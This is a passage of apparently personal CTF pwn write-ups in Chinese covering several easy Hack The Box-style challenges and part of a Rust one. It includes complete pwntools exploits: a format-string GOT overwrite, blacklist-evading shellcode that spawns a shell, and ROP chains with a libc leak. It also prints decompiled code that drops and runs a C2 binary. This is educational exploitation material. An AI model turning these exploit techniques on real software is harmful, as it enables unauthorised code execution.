r0bob1rd#

Difficulty#

EASY

Description#

I am developing a brand new game with robotic birds. Would you like to test my progress so far?

Write-up#

1
unsigned __int64 operation()
2
{
3
  unsigned int v1; // [rsp+Ch] [rbp-74h] BYREF
4
  char s[104]; // [rsp+10h] [rbp-70h] BYREF
5
  unsigned __int64 v3; // [rsp+78h] [rbp-8h]
6

7
  v3 = __readfsqword(0x28u);
8
  printf("\nSelect a R0bob1rd > ");
9
  fflush(stdout);
10
  __isoc99_scanf("%d", &v1);
11
  if ( v1 > 9 )
12
    printf("\nYou've chosen: %s", (const char *)&(&robobirdNames)[v1]);
13
  else
14
    printf("\nYou've chosen: %s", (&robobirdNames)[v1]);
15
  getchar();
16
  puts("\n\nEnter bird's little description");
17
  printf("> ");
18
  fgets(s, 106, stdin);
19
  puts("Crafting..");
20
  usleep(0x1E8480u);
21
  start_screen();
22
  puts("[Description]");
23
  printf(s);
24
  return __readfsqword(0x28u) ^ v3;
25
}

观察到 operation 函数存在几个漏洞：

if ( v1 > 9 ) 没有对 v1 做边界检查，OOB
fgets(s, 106, stdin); BOF
printf(s); 格式化字符串

先看看 robobirdNames 附近有什么东西：

pwndbg> x/a &robobirdNames
0x6020a0 <robobirdNames>: 0x400ce8
pwndbg> x/50gx 0x6020a0-0x100
0x601fa0: 0x0000000000000000 0x0000000000000000
0x601fb0: 0x0000000000000000 0x0000000000000000
0x601fc0: 0x0000000000000000 0x0000000000000000
0x601fd0: 0x0000000000000000 0x0000000000000000
0x601fe0: 0x0000000000000000 0x0000000000000000
0x601ff0: 0x00007ffff7c58f90 0x0000000000000000
0x602000: 0x0000000000601e10 0x00007ffff7e29190
0x602010: 0x00007ffff7c15df0 0x0000000000400766
0x602020 <puts@got.plt>: 0x00007ffff7cb9420 0x0000000000400786
0x602030 <printf@got.plt>: 0x00007ffff7c96c90 0x00007ffff7d17d90
0x602040 <fgets@got.plt>: 0x00000000004007b6 0x00000000004007c6
0x602050 <signal@got.plt>: 0x00007ffff7c77f00 0x00007ffff7cb7340
0x602060 <setvbuf@got.plt>: 0x00007ffff7cb9ce0 0x00007ffff7c980b0
0x602070 <usleep@got.plt>: 0x0000000000400816 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000000 0x0000000000000000
0x6020a0 <robobirdNames>: 0x0000000000400ce8 0x0000000000400cf2
0x6020b0 <robobirdNames+16>: 0x0000000000400cff 0x0000000000400d0c
0x6020c0 <robobirdNames+32>: 0x0000000000400d18 0x0000000000400d26
0x6020d0 <robobirdNames+48>: 0x0000000000400d30 0x0000000000400d40
0x6020e0 <robobirdNames+64>: 0x0000000000400d4b 0x0000000000400d5b
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100 <stdout@@GLIBC_2.2.5>: 0x00007ffff7e226a0 0x0000000000000000
0x602110 <stdin@@GLIBC_2.2.5>: 0x00007ffff7e21980 0x0000000000000000
0x602120 <stderr@@GLIBC_2.2.5>: 0x00007ffff7e225c0 0x0000000000000000

注意到这个地址下方不远处就是 got 表，因此我们可以通过输入负索引来泄漏它，然后算出 libc 基址。

所以最后思路应该是泄漏 setvbuf，计算出 one_gadget 的地址，再利用格式化字符串漏洞篡改 __stack_chk_fail 为 one_gadget 地址。而为了触发 __stack_chk_fail，我们需要利用 fgets 的 BOF 来破坏 canary.

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import (
4
    ELF,
5
    args,
6
    context,
7
    fmtstr_payload,
8
    process,
9
    raw_input,
10
    remote,
11
    u64,
12
)
13

14
FILE = "./r0bob1rd"
15
HOST, PORT = "94.237.122.117", 56995
16

17
context(log_level="debug", binary=FILE, terminal="kitty")
18

19
elf = context.binary
20
libc = ELF("./glibc/libc.so.6")
21

22

23
def launch():
24
    if args.L:
25
        target = process(FILE)
26
    else:
27
        target = remote(HOST, PORT)
28
    return target
29

30

31
def main():
32
    target = launch()
33

34
    target.sendlineafter(b"> ", str(-8))
35
    target.recvuntil(b": ")
36

37
    setvbuf = u64(target.recvline().strip().ljust(0x8, b"\x00"))
38
    libc.address = setvbuf - libc.sym["setvbuf"]
39
    one_gadget = libc.address + 0xE3B01
40

41
    fmtstr = fmtstr_payload(
42
        8, {elf.got["__stack_chk_fail"]: one_gadget}, write_size="short"
43
    )
44
    # raw_input("DEBUG")
45
    target.sendlineafter(b"> ", fmtstr.ljust(106, b"\x00"))
46

47
    target.interactive()
48

49

50
if __name__ == "__main__":
51
    main()

Execute#

Difficulty#

EASY

Description#

Can you feed the hungry code?

Write-up#

保护全开，但是栈可执行。

1
// gcc execute.c -z execstack -o execute
2

3
#include <signal.h>
4
#include <stdio.h>
5
#include <stdlib.h>
6
#include <string.h>
7
#include <unistd.h>
8

9
void setup() {
10
  setvbuf(stdin, NULL, _IONBF, 0);
11
  setvbuf(stdout, NULL, _IONBF, 0);
12
  setvbuf(stderr, NULL, _IONBF, 0);
13
  alarm(0x7f);
14
}
15

16
int check(char *blacklist, char *buf, int read_size, int blacklist_size) {
17
  for (int i = 0; i < blacklist_size; i++) {
18
    for (int j = 0; j < read_size - 1; j++) {
19
      if (blacklist[i] == buf[j])
20
        return 0;
21
    }
22
  }
23

24
  return 1337;
25
}
26

27
int main() {
28
  char buf[62];
29
  char blacklist[] =
30
      "\x3b\x54\x62\x69\x6e\x73\x68\xf6\xd2\xc0\x5f\xc9\x66\x6c\x61\x67";
31

32
  setup();
33

34
  puts("Hey, just because I am hungry doesn't mean I'll execute everything");
35

36
  int size = read(0, buf, 60);
37

38
  if (!check(blacklist, buf, size, strlen(blacklist))) {
39
    puts("Hehe, told you... won't accept everything");
40
    exit(1337);
41
  }
42

43
  ((void (*)())buf)();
44
}

程序对我们的输入做了一个检查，禁用了一些字节，除此以外没有太多限制。所以思路还是打 shellcode.

关于 mask 的爆破，利用了 a ^ b ^ b = a 的性质。

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import (
4
    args,
5
    asm,
6
    context,
7
    disasm,
8
    log,
9
    p64,
10
    process,
11
    raw_input,
12
    remote,
13
    u64,
14
)
15

16
FILE = "./execute"
17
HOST, PORT = "94.237.54.192", 31583
18

19
context(log_level="debug", binary=FILE, terminal="kitty")
20

21
elf = context.binary
22

23

24
def launch():
25
    if args.L:
26
        target = process(FILE)
27
    else:
28
        target = remote(HOST, PORT)
29
    return target
30

31

32
def main():
33
    target = launch()
34

35
    blacklist = set(b"\x3b\x54\x62\x69\x6e\x73\x68\xf6\xd2\xc0\x5f\xc9\x66\x6c\x61\x67")
36
    mask = b""
37
    target_string = u64(b"/bin/sh".ljust(0x8, b"\x00"))
38

39
    for byte in range(0, 0x100):
40
        mask = int(f"{byte:02x}" * 8, 16)
41
        encoded = p64(mask ^ target_string)
42

43
        if all(byte not in blacklist for byte in encoded):
44
            log.success(f"Found mask: {hex(mask)}")
45
            break
46

47
    payload = asm(f"""
48
        mov rax, {mask}
49
        push rax
50
        mov rax, {mask} ^ {target_string}
51
        xor [rsp], rax
52
        mov rdi, rsp
53
        push 0
54
        pop rsi
55
        push 0
56
        pop rdx
57
        mov rbx, 0x3a
58
        inc rbx
59
        mov rax, rbx
60
        syscall
61
    """)
62

63
    log.success(disasm(payload))
64

65
    for byte in payload:
66
        if byte in blacklist:
67
            log.warn(f"Bad byte: {byte:2x}")
68

69
    # raw_input("DEBUG")
70
    target.sendline(payload)
71
    target.interactive()
72

73

74
if __name__ == "__main__":
75
    main()

Restaurant#

Difficulty#

EASY

Description#

Welcome to our Restaurant. Here, you can eat and drink as much as you want! Just don’t overdo it..

Write-up#

只提供了 libc，为了 patchelf 还得去找对应 ld：

1
λ ~/Projects/pwn/Restaurant/ strings libc.so.6 | grep "GLIBC"
2
GLIBC_2.2.5
3
GLIBC_2.2.6
24 collapsed lines
4
GLIBC_2.3
5
GLIBC_2.3.2
6
GLIBC_2.3.3
7
GLIBC_2.3.4
8
GLIBC_2.4
9
GLIBC_2.5
10
GLIBC_2.6
11
GLIBC_2.7
12
GLIBC_2.8
13
GLIBC_2.9
14
GLIBC_2.10
15
GLIBC_2.11
16
GLIBC_2.12
17
GLIBC_2.13
18
GLIBC_2.14
19
GLIBC_2.15
20
GLIBC_2.16
21
GLIBC_2.17
22
GLIBC_2.18
23
GLIBC_2.22
24
GLIBC_2.23
25
GLIBC_2.24
26
GLIBC_2.25
27
GLIBC_2.26
28
GLIBC_2.27
29
GLIBC_PRIVATE
30
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.4) stable release version 2.27.

可以看到使用的是 GLIBC 2.27，通过 glibc-all-in-one 下载 release 版本的 GLIBC，得到对应 ld.

使用以下命令来 patchelf，--set-rpath . 是让它在当前目录下自己找 libc.so.6，我们只要通过 --set-interpreter 设置好动态连接器就行了。

1
sudo patchelf --set-interpreter "$(pwd)/ld-2.27.so" --set-rpath . ./restaurant

这个程序本身没什么复杂的，注意到只有 fill 函数里面的一个 read 存在 BOF，用它构造 ROP Chain 就好了。先泄漏 libc，然后再返回到 fill 二次输入。

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import ELF, ROP, args, context, flat, process, raw_input, remote, u64
4

5
FILE = "./restaurant"
6
HOST, PORT = "94.237.60.55", 54861
7

8
context(log_level="debug", binary=FILE, terminal="kitty")
9

10
elf = context.binary
11
rop = ROP(elf)
12
libc = ELF("./libc.so.6")
13

14

15
def launch():
16
    if args.L:
17
        target = process(FILE)
18
    else:
19
        target = remote(HOST, PORT)
20
    return target
21

22

23
def main():
24
    target = launch()
25

26
    # raw_input("DEBUG")
27
    target.sendlineafter(b"> ", str(1))
28

29
    payload = flat(
30
        b"A" * 0x28, rop.rdi.address, elf.got["puts"], elf.plt["puts"], elf.sym["fill"]
31
    )
32
    target.sendafter(b"> ", payload)
33

34
    target.recvuntil(b"\xa3\x10\x40")
35
    libc.address = u64(target.recv(0x6).strip().ljust(8, b"\x00")) - libc.sym["puts"]
36
    one_gadget = libc.address + 0x10A41C
37

38
    payload = flat(b"A" * 0x28, one_gadget)
39
    target.sendafter(b"> ", payload)
40

41
    target.interactive()
42

43

44
if __name__ == "__main__":
45
    main()

You know 0xDiablos#

Difficulty#

EASY

Description#

I missed my flag

Write-up#

BOF，后门函数 flag，检测两个参数。32-bit 栈传参，没啥好说的，不过 python 整数是无限精度的，给它 -1 它就认为这是数学上的 -1，所以我们必须通过把数字截断为 32-bit 补码的形式来模拟 C 在内存中的数据表示。

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import (
4
    args,
5
    context,
6
    fit,
7
    process,
8
    raw_input,
9
    remote,
10
)
11

12
FILE = "./vuln"
13
HOST, PORT = "94.237.57.115", 42156
14

15
context(log_level="debug", binary=FILE, terminal="kitty")
16

17
elf = context.binary
18

19

20
def launch():
21
    if args.L:
22
        target = process(FILE)
23
    else:
24
        target = remote(HOST, PORT)
25
    return target
26

27

28
def main():
29
    target = launch()
30

31
    payload = fit(
32
        {
33
            0xBC: elf.sym["flag"],
34
            0xC0: elf.sym["exit"],
35
            0xC4: -559038737 & 0xFFFFFFFF,
36
            0xC8: -1059139571 & 0xFFFFFFFF,
37
        }
38
    )
39
    # raw_input("DEBUG")
40
    target.sendlineafter(b": ", payload)
41

42
    target.interactive()
43

44

45
if __name__ == "__main__":
46
    main()

TicTacToed#

Difficulty#

MEDIUM

Description#

A lawfirm recently busted an underground network of a part-time cybermafia group. Upon investigation they found nothing but a single tic-tac-toe game on their computer. The forensics team suspect it to be more than just a game. Can you expose them ?

Write-up#

Jesus, its a Rust Pwn challenge! 迎接地狱难度的逆向分析吧。

先运行看看，感受一下程序的基本逻辑：

如其名，完全就是一个井字棋游戏，5 个相同棋子连成一条线就赢了。并且我们的对手……我们哪来的对手？X 和 O 的棋子都是自己控制的，谁赢谁输都是我们自行决定。嗯……这样的话应该会简单很多吧？至少不用被迫去对抗一个 AI 棋手……~~我下棋最烂了……~~

然后丢给 IDA 老婆，逆天，光是 IDA 加载并分析完这个程序都足足花了几分钟才完成，它太大了。也不知道作者在里面塞了些什么乱七八糟的东西……整个程序有整整 5.5M 大小。

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  return std::rt::lang_start(&tictactoe::main, argc, argv, 0LL);
4
}

第一次做 Rust Pwn，发现反汇编出来和 C 语法都差不多，先定位 main 函数，发现叫 tictactoe::main。根据我之前学过的那么一丢丢 rust 语法，tictactoe 应该就是这个程序的 crate 名。

crate 的话就类似于其它语言中的 package 的概念，一般这些 package 下都包含了多个相关的函数实现，我们可以在 IDA 的 Function name 窗口进行搜索，发现这个 crate 里确实包含了不少东西：

其中比较引人注目的应该是这个叫做 tictactoe::execute_c2 的函数，一眼 backdoor.

1
__int64 __fastcall tictactoe::execute_c2(int a1, int a2, int a3, int a4, int a5, int a6)
2
{
3
  int v6; // eax
4
  int v7; // r8d
5
  int v8; // r9d
6
  int v9; // eax
7
  int v10; // ecx
8
  int v11; // r8d
9
  int v12; // r9d
10
  int v13; // eax
11
  int v14; // r8d
12
  int v15; // r9d
13
  int v16; // ecx
14
  int v17; // r8d
15
  int v18; // r9d
16
  int v19; // r9d
17
  int v20; // edx
18
  int v21; // ecx
19
  int v22; // r8d
20
  int v23; // r9d
21
  int v25; // [rsp+0h] [rbp-148h]
22
  int v26; // [rsp+0h] [rbp-148h]
23
  int v27; // [rsp+0h] [rbp-148h]
24
  int v28; // [rsp+0h] [rbp-148h]
25
  int v29; // [rsp+0h] [rbp-148h]
26
  struct _Unwind_Exception *v30; // [rsp+0h] [rbp-148h]
27
  int v31; // [rsp+8h] [rbp-140h]
28
  int v32; // [rsp+8h] [rbp-140h]
29
  int v33; // [rsp+8h] [rbp-140h]
30
  int v34; // [rsp+8h] [rbp-140h]
31
  int v35; // [rsp+8h] [rbp-140h]
32
  int v36; // [rsp+8h] [rbp-140h]
33
  int v37; // [rsp+10h] [rbp-138h]
34
  int v38; // [rsp+10h] [rbp-138h]
35
  int v39; // [rsp+10h] [rbp-138h]
36
  int v40; // [rsp+10h] [rbp-138h]
37
  int v41[2]; // [rsp+10h] [rbp-138h]
38
  int v42; // [rsp+18h] [rbp-130h]
39
  char v43; // [rsp+18h] [rbp-130h]
40
  int v44; // [rsp+18h] [rbp-130h]
41
  char v45; // [rsp+18h] [rbp-130h]
42
  int v46; // [rsp+18h] [rbp-130h]
43
  int v47; // [rsp+18h] [rbp-130h]
44
  int v48; // [rsp+1Ch] [rbp-12Ch] BYREF
45
  struct _Unwind_Exception *v49; // [rsp+20h] [rbp-128h]
46
  int v50; // [rsp+28h] [rbp-120h]
47
  struct _Unwind_Exception *v51; // [rsp+30h] [rbp-118h]
48
  int v52; // [rsp+38h] [rbp-110h] BYREF
49
  int v53; // [rsp+40h] [rbp-108h]
50
  int v54; // [rsp+48h] [rbp-100h]
51
  struct _Unwind_Exception *v55; // [rsp+50h] [rbp-F8h]
52
  int v56[42]; // [rsp+58h] [rbp-F0h] BYREF
53
  struct _Unwind_Exception *v57; // [rsp+100h] [rbp-48h]
54
  int v58; // [rsp+108h] [rbp-40h]
55
  _BYTE v59[32]; // [rsp+128h] [rbp-20h] BYREF
56

57
  v6 = std::fs::write(
58
         (int)aTmpC2Executabl,
59
         18,
60
         (int)&off_3A4F30,
61
         a4,
62
         a5,
63
         a6,
64
         (int)aTmpC2Executabl,
65
         18,
66
         v37,
67
         v42,
68
         (int)v49,
69
         v50,
70
         (int)v51,
71
         v52,
72
         v53,
73
         v54,
74
         v55,
75
         v56[0]);
76
  core::result::Result<T,E>::expect(
77
    v6,
78
    (int)aFailedToWriteC,
79
    25,
80
    (int)&off_3A4F40,
81
    v7,
82
    v8,
83
    v25,
84
    v31,
85
    v38,
86
    v43,
87
    v49,
88
    v50);
89
  v9 = <std::fs::Permissions as std::os::unix::fs::PermissionsExt>::from_mode(493LL);
90
  v13 = std::fs::set_permissions(v26, v32, v9, v10, v11, v12, v26, v32, v39, v44, (int)v49, v50, v51, v52);
91
  core::result::Result<T,E>::expect(
92
    v13,
93
    (int)aFailedToSetExe,
94
    33,
95
    (int)&off_3A4F58,
96
    v14,
97
    v15,
98
    v27,
99
    v33,
100
    v40,
101
    v45,
102
    v49,
103
    v50);
104
  std::process::Command::new(
105
    (int)v56,
106
    v28,
107
    v34,
108
    v16,
109
    v17,
110
    v18,
111
    v28,
112
    v34,
113
    (int)v56,
114
    v46,
115
    (int)v49,
116
    v50,
117
    (int)v51,
118
    v52,
119
    v53,
120
    v54,
121
    (int)v55,
122
    v56[0],
123
    v56[2],
124
    v56[4],
125
    v56[6],
126
    v56[8],
127
    v56[10],
128
    v56[12],
129
    v56[14],
130
    v56[16],
131
    v56[18],
132
    v56[20],
133
    v56[22],
134
    v56[24],
135
    v56[26],
136
    v56[28],
137
    v56[30],
138
    v56[32],
139
    v56[34],
140
    v56[36],
141
    v56[38],
142
    v56[40],
143
    v57,
144
    v58);
145
  std::process::Command::spawn(&v52, *(_QWORD *)v41);
146
  core::result::Result<T,E>::expect(
147
    (int)&v48,
148
    (int)&v52,
149
    (int)aFailedToExecut,
150
    27,
151
    (int)&off_3A4F70,
152
    v19,
153
    v29,
154
    v35,
155
    v41[0],
156
    v47,
157
    (int)v49,
158
    v50,
159
    v51,
160
    v52);
161
  core::ptr::drop_in_place<std::process::Command>(v56);
162
  std::process::Child::wait(v59, &v48);
163
  core::ptr::drop_in_place<core::result::Result<std::process::ExitStatus,std::io::error::Error>>(v59);
164
  return core::ptr::drop_in_place<std::process::Child>((int)&v48, (int)&v48, v20, v21, v22, v23, v30, v36);
165
}

进去一看虽说有一大坨，不过细看其实很简单。std::fs::write 将 C2 (Command and Control) 后门程序写入到 /tmp/C2_executable 中（程序里塞程序，难怪那么大……），并通过 std::fs::set_permissions 将权限设置为 0755，这一点可以从 from_mode(493LL) 看出来。接着，通过 std::process::Command::new 创建准备执行的命令行指令（这会设置好它的参数，环境变量等）。用脚想都可以猜出来创建的命令肯定是用来执行 C2 的，根本用不着去分析参数。然后用 std::process::Command::spawn 生成子进程，异步运行 Command 创建的指令。嗯……看到这里就不用继续了，后面无非就是释放空间和获取子进程的退出状态等操作，对我们来说没多大用处。

此时，我们的宏观目标已经是非常清晰的了，就是要搞清楚如何调用 tictactoe::execute_c2。一开始我想着可能有输入方面的漏洞，然后构造一个 ROP Chain 或者什么东西去调用它。不过我同时又清楚，Rust 以其安全性而扬名，所以题目如果是考察 Rust 的编码漏洞，那就未免有点太难了，虽然不排除确实有这个可能……总之，我在这一块还是浪费了将近一个小时，去研究 main 函数中对输入的处理是否存在什么漏洞，事实证明根本没有……

下面来分析 main 函数的基本逻辑：

1
__int64 tictactoe::main()
2
{
3
  int *v0; // rcx
4
  __int64 v1; // rdx
5
  int line; // eax
6
  int v3; // edx
7
  int v4; // r9d
8
  __int64 v5; // rax
9
  __int64 v6; // rdx
10
  __int64 v7; // rcx
11
  int v8; // r8d
12
  int v9; // r9d
13
  int v10; // esi
14
  int v11; // edx
15
  int v12; // ecx
16
  int v13; // r8d
17
  int v14; // r9d
18
  char **v15; // rsi
19
  int v16; // edx
20
  int v17; // ecx
21
  int v18; // r8d
22
  int v19; // r9d
23
  int v20; // edx
24
  int v21; // ecx
25
  int v22; // r8d
26
  int v23; // r9d
27
  int v25; // edx
28
  int v26; // ecx
29
  int v27; // r8d
30
  int v28; // r9d
31
  __int64 v29; // rdx
32
  int v30; // [rsp+0h] [rbp-4E8h]
33
  struct _Unwind_Exception *v31; // [rsp+0h] [rbp-4E8h]
34
  struct _Unwind_Exception *v32; // [rsp+0h] [rbp-4E8h]
35
  struct _Unwind_Exception *v33; // [rsp+0h] [rbp-4E8h]
36
  __int64 v34; // [rsp+8h] [rbp-4E0h]
37
  int v35; // [rsp+8h] [rbp-4E0h]
38
  int v36; // [rsp+8h] [rbp-4E0h]
39
  int v37; // [rsp+8h] [rbp-4E0h]
40
  __int64 v38; // [rsp+10h] [rbp-4D8h]
41
  __int64 v39; // [rsp+18h] [rbp-4D0h]
42
  int v40; // [rsp+20h] [rbp-4C8h]
43
  char is_full; // [rsp+26h] [rbp-4C2h]
44
  char v42; // [rsp+27h] [rbp-4C1h]
45
  char v43; // [rsp+28h] [rbp-4C0h]
46
  int v44[2]; // [rsp+28h] [rbp-4C0h]
47
  struct _Unwind_Exception *v45; // [rsp+30h] [rbp-4B8h]
48
  __int64 *v46; // [rsp+30h] [rbp-4B8h]
49
  int v47; // [rsp+38h] [rbp-4B0h]
50
  _QWORD *v48; // [rsp+38h] [rbp-4B0h]
51
  struct _Unwind_Exception *v49; // [rsp+40h] [rbp-4A8h]
52
  struct _Unwind_Exception **v50; // [rsp+48h] [rbp-4A0h]
53
  int v51[2]; // [rsp+50h] [rbp-498h]
54
  int v52; // [rsp+5Ch] [rbp-48Ch]
55
  int v53[2]; // [rsp+68h] [rbp-480h]
56
  _QWORD *v54; // [rsp+70h] [rbp-478h]
57
  int v55[2]; // [rsp+78h] [rbp-470h]
58
  char v56[8]; // [rsp+D8h] [rbp-410h]
59
  char v57[8]; // [rsp+138h] [rbp-3B0h]
60
  int v58[2]; // [rsp+148h] [rbp-3A0h]
61
  int v59[25]; // [rsp+154h] [rbp-394h] BYREF
62
  _QWORD v60[2]; // [rsp+1B8h] [rbp-330h]
63
  int v61; // [rsp+1C8h] [rbp-320h]
64
  int v62; // [rsp+1CCh] [rbp-31Ch] BYREF
65
  int v63[6]; // [rsp+1D0h] [rbp-318h] BYREF
66
  int v64[2]; // [rsp+1E8h] [rbp-300h] BYREF
67
  int v65[2]; // [rsp+1F0h] [rbp-2F8h]
68
  char v66[8]; // [rsp+1F8h] [rbp-2F0h]
69
  _QWORD v67[2]; // [rsp+200h] [rbp-2E8h] BYREF
70
  int *v68; // [rsp+210h] [rbp-2D8h]
71
  int v69; // [rsp+21Ch] [rbp-2CCh] BYREF
72
  _BYTE v70[48]; // [rsp+220h] [rbp-2C8h] BYREF
73
  __int128 v71; // [rsp+250h] [rbp-298h] BYREF
74
  __int128 v72; // [rsp+268h] [rbp-280h] BYREF
75
  __int64 v73; // [rsp+278h] [rbp-270h] BYREF
76
  _BYTE v74[48]; // [rsp+280h] [rbp-268h] BYREF
77
  _BYTE v75[48]; // [rsp+2B0h] [rbp-238h] BYREF
78
  int v76[4]; // [rsp+2E0h] [rbp-208h] BYREF
79
  int v77[4]; // [rsp+2F8h] [rbp-1F0h] BYREF
80
  int v78[2]; // [rsp+308h] [rbp-1E0h] BYREF
81
  char v79[24]; // [rsp+310h] [rbp-1D8h] BYREF
82
  char v80[8]; // [rsp+328h] [rbp-1C0h] BYREF
83
  int v81[6]; // [rsp+330h] [rbp-1B8h] BYREF
84
  _BYTE v82[64]; // [rsp+348h] [rbp-1A0h] BYREF
85
  int v83[16]; // [rsp+388h] [rbp-160h] BYREF
86
  _BYTE v84[48]; // [rsp+3C8h] [rbp-120h] BYREF
87
  int v85[2]; // [rsp+3F8h] [rbp-F0h] BYREF
88
  __int64 v86; // [rsp+400h] [rbp-E8h]
89
  int v87; // [rsp+408h] [rbp-E0h]
90
  _BYTE v88[48]; // [rsp+410h] [rbp-D8h] BYREF
91
  __int128 v89; // [rsp+440h] [rbp-A8h] BYREF
92
  __int128 v90; // [rsp+450h] [rbp-98h] BYREF
93
  _BYTE v91[52]; // [rsp+460h] [rbp-88h] BYREF
94
  int v92; // [rsp+494h] [rbp-54h]
95
  __int64 v93; // [rsp+4A8h] [rbp-40h]
96
  __int64 v94[3]; // [rsp+4B0h] [rbp-38h] BYREF
97
  __int64 v95; // [rsp+4C8h] [rbp-20h]
98
  __int64 v96[3]; // [rsp+4D0h] [rbp-18h] BYREF
99

100
  tictactoe::detect_debugger();
101
  for ( *(_QWORD *)v58 = 0LL; *(_QWORD *)v58 < 5uLL; ++*(_QWORD *)v58 )
102
    *((_DWORD *)v60 + *(_QWORD *)v58) = 45;
103
  for ( *(_QWORD *)v57 = 0LL; *(_QWORD *)v57 < 5uLL; ++*(_QWORD *)v57 )
104
  {
105
    v0 = &v59[5 * *(_QWORD *)v57];
106
    *(_QWORD *)v0 = v60[0];
107
    *((_QWORD *)v0 + 1) = v60[1];
108
    v0[4] = v61;
109
  }
110
  v62 = 88;
111
  alloc::vec::Vec<T>::new(v63);
112
  while ( 1 )
113
  {
114
    while ( 1 )
115
    {
116
      *(_QWORD *)v64 = core::array::<impl core::iter::traits::collect::IntoIterator for &[T; N]>::into_iter(v59);
117
      *(_QWORD *)v65 = v1;
118
      while ( 1 )
119
      {
120
        *(_QWORD *)v66 = <core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::next(v64);
121
        if ( !*(_QWORD *)v66 )
122
          break;
123
        v67[0] = core::array::<impl core::iter::traits::collect::IntoIterator for &[T; N]>::into_iter(*(_QWORD *)v66);
124
        v67[1] = v29;
125
        while ( 1 )
126
        {
127
          v39 = <core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::next(v67);
128
          v68 = (int *)v39;
129
          if ( !v39 )
130
            break;
131
          v69 = *v68;
132
          core::fmt::rt::Argument::new_display(&v72, &v69);
133
          v71 = v72;
134
          core::fmt::Arguments::new_v1(v70, &unk_3A52E8, &v71);
135
          std::io::stdio::_print(v70);
136
          v38 = std::io::stdio::stdout();
137
          v73 = v38;
138
          v34 = <std::io::stdio::Stdout as std::io::Write>::flush(&v73);
139
          v93 = v34;
140
          if ( v34 )
141
          {
142
            v94[0] = v93;
143
            core::result::unwrap_failed(aCalledResultUn, 43LL, v94, &off_3A4F00, &off_3A5308);
144
          }
145
        }
146
        core::fmt::Arguments::new_const(v74, &off_3A52D8);
147
        std::io::stdio::_print(v74);
148
      }
149
      core::fmt::rt::Argument::new_display(v77, &v62);
150
      *(_OWORD *)v76 = *(_OWORD *)v77;
151
      core::fmt::Arguments::new_v1(v75, &off_3A5140, v76);
152
      std::io::stdio::_print(v75);
153
      *(_QWORD *)v78 = std::io::stdio::stdout();
154
      *(_QWORD *)v56 = <std::io::stdio::Stdout as std::io::Write>::flush(v78);
155
      v95 = *(_QWORD *)v56;
156
      if ( *(_QWORD *)v56 )
157
      {
158
        v96[0] = v95;
159
        core::result::unwrap_failed(aCalledResultUn, 43LL, v96, &off_3A4F00, &off_3A5160);
160
      }
161
      alloc::string::String::new(v79);
162
      *(_QWORD *)v80 = std::io::stdio::stdin();
163
      line = std::io::stdio::Stdin::read_line(v80, v79);
164
      core::result::Result<T,E>::expect(
165
        line,
166
        v3,
167
        (int)aFailedToReadLi,
168
        19,
169
        (int)&off_3A5178,
170
        v4,
171
        v30,
172
        v34,
173
        v38,
174
        v39,
175
        v40,
176
        v43,
177
        v45,
178
        v47);
179
      v5 = <alloc::string::String as core::ops::deref::Deref>::deref(v79);
180
      core::str::<impl str>::trim(v5, v6);
181
      core::str::<impl str>::split_whitespace((int)v83);
182
      core::iter::traits::iterator::Iterator::filter_map(v82, v83);
183
      core::iter::traits::iterator::Iterator::collect(v81, v82);
184
      if ( alloc::vec::Vec<T,A>::len(v81) == 2
185
        && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5190) < 5uLL
186
        && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A51A8) < 5uLL )
187
      {
188
        *(_QWORD *)v55 = *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A51C0);
189
        if ( *(_QWORD *)v55 >= 5uLL )
190
          core::panicking::panic_bounds_check(*(_QWORD *)v55, 5LL, &off_3A51D8);
191
        v54 = (_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A51F0);
192
        *(_QWORD *)v53 = *v54;
193
        if ( *v54 >= 5uLL )
194
          core::panicking::panic_bounds_check(*(_QWORD *)v53, 5LL, &off_3A51D8);
195
        if ( v59[5 * *(_QWORD *)v55 + *(_QWORD *)v53] == 45 )
196
          break;
197
      }
198
      core::fmt::Arguments::new_const(v84, &off_3A52C8);
199
      std::io::stdio::_print(v84);
200
      core::ptr::drop_in_place<alloc::vec::Vec<usize>>((int)v81, (int)&off_3A52C8, v25, v26, v27, v28, v31, v35);
201
      core::ptr::drop_in_place<alloc::string::String>(v79);
202
    }
203
    v52 = v62;
204
    *(_QWORD *)v51 = *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5208);
205
    if ( *(_QWORD *)v51 >= 5uLL )
206
      core::panicking::panic_bounds_check(*(_QWORD *)v51, 5LL, &off_3A5220);
207
    v50 = (struct _Unwind_Exception **)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(
208
                                         v81,
209
                                         1LL,
210
                                         &off_3A5238);
211
    v49 = *v50;
212
    if ( (unsigned __int64)*v50 >= 5 )
213
      core::panicking::panic_bounds_check(v49, 5LL, &off_3A5220);
214
    v59[5 * *(_QWORD *)v51 + (_QWORD)v49] = v52;
215
    v48 = (_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5250);
216
    *(_QWORD *)v44 = *v48;
217
    v46 = (__int64 *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A5268);
218
    v7 = *v46;
219
    *(_QWORD *)v85 = *(_QWORD *)v44;
220
    v86 = v7;
221
    v87 = v62;
222
    alloc::vec::Vec<T,A>::push(
223
      (int)v63,
224
      (int)v85,
225
      (int)&off_3A5280,
226
      v7,
227
      v8,
228
      v9,
229
      (int)v31,
230
      v35,
231
      v38,
232
      v39,
233
      v40,
234
      v44[0],
235
      (int)v46,
236
      (int)v48,
237
      v49,
238
      (int)v50);
239
    v10 = v62;
240
